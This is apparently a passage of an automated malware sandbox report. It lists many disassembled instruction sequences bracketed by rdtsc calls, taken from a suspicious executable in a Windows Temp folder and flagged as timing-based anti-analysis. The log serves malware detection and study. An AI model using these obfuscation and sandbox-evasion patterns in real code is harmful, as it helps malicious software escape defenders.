                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0A47 second address: 4F0AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4C288D0393h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F4C288D038Ch 0x00000019 pop eax 0x0000001a jns 00007F4C288D038Dh 0x00000020 sub dword ptr [ebp+122D31F0h], ebx 0x00000026 lea ebx, dword ptr [ebp+12451726h] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F4C288D0388h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edx, dword ptr [ebp+122D3319h] 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F4C288D038Dh 0x00000054 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0B60 second address: 4F0B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0B68 second address: 4F0B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0B6C second address: 4F0BB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F4C28D8B366h 0x00000013 mov ecx, dword ptr [ebp+122D2BACh] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D35C5h], ecx 0x00000022 push EC3C9826h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4C28D8B35Eh 0x0000002e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0BB4 second address: 4F0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 13C3685Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4C288D0388h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D2A30h] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D31F0h], edi 0x00000038 push 00000000h 0x0000003a mov edx, ebx 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D22B2h], esi 0x00000044 call 00007F4C288D0389h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F4C288D038Ch 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C26 second address: 4F0C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F4C28D8B364h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C3C second address: 4F0C5D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F4C288D0391h 0x00000016 jmp 00007F4C288D038Bh 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C5D second address: 4F0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F4C28D8B35Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C84 second address: 4F0C97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C97 second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C28D8B356h 0x0000000a popad 0x0000000b jc 00007F4C28D8B36Dh 0x00000011 jmp 00007F4C28D8B367h 0x00000016 popad 0x00000017 pop eax 0x00000018 jo 00007F4C28D8B35Ch 0x0000001e mov esi, dword ptr [ebp+122D291Ch] 0x00000024 lea ebx, dword ptr [ebp+1245172Fh] 0x0000002a mov esi, dword ptr [ebp+122D2AB0h] 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0CE0 second address: 4F0CE6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0DA2 second address: 4F0DAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0DAC second address: 4F0E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F4C288D03A5h 0x0000000f pushad 0x00000010 jmp 00007F4C288D0397h 0x00000015 jo 00007F4C288D0386h 0x0000001b popad 0x0000001c nop 0x0000001d mov dword ptr [ebp+122D31C5h], esi 0x00000023 push 00000000h 0x00000025 jmp 00007F4C288D038Bh 0x0000002a call 00007F4C288D0389h 0x0000002f push esi 0x00000030 jg 00007F4C288D038Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0E00 second address: 4F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F4C28D8B35Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jnc 00007F4C28D8B365h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F4C28D8B35Bh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jp 00007F4C28D8B360h 0x00000028 pop eax 0x00000029 mov dx, C9A8h 0x0000002d push 00000003h 0x0000002f call 00007F4C28D8B35Bh 0x00000034 mov esi, dword ptr [ebp+122D2C1Ch] 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d call 00007F4C28D8B366h 0x00000042 push esi 0x00000043 push eax 0x00000044 pop esi 0x00000045 pop edx 0x00000046 pop edi 0x00000047 push 00000003h 0x00000049 xor dword ptr [ebp+122D35C5h], ecx 0x0000004f push 8D5D34F8h 0x00000054 jmp 00007F4C28D8B361h 0x00000059 xor dword ptr [esp], 4D5D34F8h 0x00000060 lea ebx, dword ptr [ebp+1245173Ah] 0x00000066 mov edx, dword ptr [ebp+122D2B3Ch] 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0EBC second address: 4F0ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0B6C second address: 4F0BB4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e call 00007F4C288D0396h 0x00000013 mov ecx, dword ptr [ebp+122D2BACh] 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D35C5h], ecx 0x00000022 push EC3C9826h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F4C288D038Eh 0x0000002e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0BB4 second address: 4F0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 13C3685Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007F4C28D8B358h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a mov edx, dword ptr [ebp+122D2A30h] 0x00000030 push 00000003h 0x00000032 mov dword ptr [ebp+122D31F0h], edi 0x00000038 push 00000000h 0x0000003a mov edx, ebx 0x0000003c push 00000003h 0x0000003e mov dword ptr [ebp+122D22B2h], esi 0x00000044 call 00007F4C28D8B359h 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F4C28D8B35Ch 0x00000051 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C26 second address: 4F0C3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F4C288D0394h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C3C second address: 4F0C5D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F4C28D8B361h 0x00000016 jmp 00007F4C28D8B35Bh 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C5D second address: 4F0C84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c jmp 00007F4C288D038Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C84 second address: 4F0C97 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0C97 second address: 4F0CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C288D0386h 0x0000000a popad 0x0000000b jc 00007F4C288D039Dh 0x00000011 jmp 00007F4C288D0397h 0x00000016 popad 0x00000017 pop eax 0x00000018 jo 00007F4C288D038Ch 0x0000001e mov esi, dword ptr [ebp+122D291Ch] 0x00000024 lea ebx, dword ptr [ebp+1245172Fh] 0x0000002a mov esi, dword ptr [ebp+122D2AB0h] 0x00000030 xchg eax, ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0DA2 second address: 4F0DAC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0DAC second address: 4F0E00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F4C28D8B375h 0x0000000f pushad 0x00000010 jmp 00007F4C28D8B367h 0x00000015 jo 00007F4C28D8B356h 0x0000001b popad 0x0000001c nop 0x0000001d mov dword ptr [ebp+122D31C5h], esi 0x00000023 push 00000000h 0x00000025 jmp 00007F4C28D8B35Bh 0x0000002a call 00007F4C28D8B359h 0x0000002f push esi 0x00000030 jg 00007F4C28D8B35Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0E00 second address: 4F0EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jmp 00007F4C288D038Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jnc 00007F4C288D0395h 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F4C288D038Bh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jp 00007F4C288D0390h 0x00000028 pop eax 0x00000029 mov dx, C9A8h 0x0000002d push 00000003h 0x0000002f call 00007F4C288D038Bh 0x00000034 mov esi, dword ptr [ebp+122D2C1Ch] 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d call 00007F4C288D0396h 0x00000042 push esi 0x00000043 push eax 0x00000044 pop esi 0x00000045 pop edx 0x00000046 pop edi 0x00000047 push 00000003h 0x00000049 xor dword ptr [ebp+122D35C5h], ecx 0x0000004f push 8D5D34F8h 0x00000054 jmp 00007F4C288D0391h 0x00000059 xor dword ptr [esp], 4D5D34F8h 0x00000060 lea ebx, dword ptr [ebp+1245173Ah] 0x00000066 mov edx, dword ptr [ebp+122D2B3Ch] 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 pushad 0x00000072 popad 0x00000073 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4F0EBC second address: 4F0ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B362h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4E0E76 second address: 4E0E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4C288D038Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F4C288D0386h 0x00000015 jnp 00007F4C288D0386h 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4E0E99 second address: 4E0EA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B35Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 51161A second address: 511638 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F4C288D0397h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 5118CB second address: 511903 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4C28D8B362h 0x00000008 jmp 00007F4C28D8B35Ch 0x0000000d push esi 0x0000000e ja 00007F4C28D8B356h 0x00000014 jmp 00007F4C28D8B362h 0x00000019 pop esi 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511A64 second address: 511A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511A6A second address: 511A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4C28D8B356h 0x0000000d jmp 00007F4C28D8B362h 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511A89 second address: 511AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0392h 0x00000007 jnl 00007F4C288D0386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 jbe 00007F4C288D0386h 0x00000018 push edx 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511AB1 second address: 511ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B360h 0x00000009 js 00007F4C28D8B356h 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511ACB second address: 511ADB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511ADB second address: 511ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511E27 second address: 511E31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4C288D0386h 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511E31 second address: 511E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 511FD1 second address: 51200A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0391h 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 jmp 00007F4C288D0394h 0x00000015 pushad 0x00000016 jc 00007F4C288D0386h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 51228D second address: 512291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 512291 second address: 5122D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F4C288D0386h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F4C288D038Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jng 00007F4C288D0386h 0x00000025 pushad 0x00000026 popad 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c push esi 0x0000002d pushad 0x0000002e popad 0x0000002f pop esi 0x00000030 jg 00007F4C288D038Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 5122D2 second address: 5122DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 51242D second address: 51244F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4C288D0386h 0x0000000a push eax 0x0000000b jnp 00007F4C288D0386h 0x00000011 jns 00007F4C288D0386h 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a jl 00007F4C288D038Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 51244F second address: 512459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 512459 second address: 51245D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 512B30 second address: 512B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4C28D8B356h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 512B3C second address: 512B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4C288D0386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007F4C288D0386h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 512CB0 second address: 512CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 5153C6 second address: 5153CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4E439B second address: 4E439F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 518CD3 second address: 518D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007F4C288D039Ah 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jne 00007F4C288D038Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 518D09 second address: 518D20 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F4C28D8B358h 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 518D20 second address: 518D47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4C288D0390h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push edx 0x00000011 jnl 00007F4C288D0386h 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 518E38 second address: 518E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B363h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 518F56 second address: 518F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D5475 second address: 4D547B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D547B second address: 4D5489 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe RDTSC instruction interceptor: First address: 4D5489 second address: 4D5493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C28D8B356h 0x0000000a rdtsc
